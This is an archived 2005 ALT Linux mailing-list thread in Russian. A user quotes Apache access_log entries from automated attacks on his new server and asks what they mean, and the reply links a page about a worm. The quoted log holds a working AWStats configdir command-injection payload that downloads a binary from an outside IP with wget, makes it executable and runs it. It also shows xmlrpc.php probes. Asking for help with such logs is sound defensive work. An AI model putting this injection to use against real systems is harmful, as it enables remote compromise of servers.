From mboxrd@z Thu Jan 1 00:00:00 1970 Return-Path: Message-ID: <4374B713.9010109@de-bs.ru> Date: Fri, 11 Nov 2005 18:21:55 +0300 From: Sergey Viuchny User-Agent: Mozilla Thunderbird 1.0.6 (X11/20050815) X-Accept-Language: en-us, en MIME-Version: 1.0 To: ALT Linux Community Subject: Re: [Comm] =?windows-1251?Q?=FE=C5=C7=CF_=CF=D4_=CD=C5=CE=D1?= =?windows-1251?Q?_=C8=CF=D4=D1=D4=3F?= References: In-Reply-To: Content-Type: text/plain; charset=windows-1251 Content-Transfer-Encoding: 8bit X-BeenThere: community@lists.altlinux.org X-Mailman-Version: 2.1.5 Precedence: list Reply-To: ALT Linux Community List-Id: ALT Linux Community List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 11 Nov 2005 15:21:58 -0000 Archived-At: List-Archive: List-Post: наверное это ? http://www.securitylab.ru/virus/241858.php Oleg Dolgov wrote: >Здравствуйте. > >Запустил у себя апач в базовой конфигурации, никаких дополнений и т.п. >Скажем так, на попробовать. Т.к. открылся >наружу 80-й порт, периодически получаю порции трафика :-\ > >В access_log следующее: > >61.19.194.4 - - [11/Nov/2005:16:50:29 +0200] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 302 >61.19.194.4 - - [11/Nov/2005:16:50:31 +0200] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 302 >61.19.194.4 - - [11/Nov/2005:16:50:33 +0200] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 310 >61.19.194.4 - - [11/Nov/2005:16:50:35 +0200] "POST /xmlrpc.php HTTP/1.1" 404 294 >61.19.194.4 - - [11/Nov/2005:16:50:37 +0200] "POST /blog/xmlrpc.php HTTP/1.1" 404 299 >61.19.194.4 - - [11/Nov/2005:16:50:38 +0200] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 306 >61.19.194.4 - - [11/Nov/2005:16:50:40 +0200] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 307 >61.19.194.4 - - [11/Nov/2005:16:50:42 +0200] "POST /drupal/xmlrpc.php HTTP/1.1" 404 301 >61.19.194.4 - - [11/Nov/2005:16:50:45 +0200] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 304 >61.19.194.4 - - [11/Nov/2005:16:50:45 +0200] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 307 >61.19.194.4 - - [11/Nov/2005:16:50:46 +0200] "POST /xmlrpc.php HTTP/1.1" 404 294 >61.19.194.4 - - [11/Nov/2005:16:50:51 +0200] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 301 >61.19.194.4 - - [11/Nov/2005:16:50:52 +0200] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 301 > >Если не сложно, в двух словах для чайника: чего этим добиваются и чем мне это грозит. > >Заранее благодарен. > >PS. В message при этом iptables (вернее kernel) отчитывается, что ABORTED от этого хоста. > >kernel: ABORTED IN=eth0 OUT= MAC=00:0e:2e:37:43:61:00:02:44:51:1e:0c:08:00 >SRC=61.19.194.4 DST='мой_ip' LEN=40 TOS=0x00 PREC=0x00 TTL=37 ID=0 DF >PROTO=TCP SPT=59285 DPT=80 SEQ=3005977375 ACK=0 WINDOW=0 RES=0x00 RST URGP=0 > >iptables устанавливал при помощи guarddog. > > > >------------------------------------------------------------------------ > >_______________________________________________ >Community mailing list >Community@lists.altlinux.org >https://lists.altlinux.org/mailman/listinfo/community >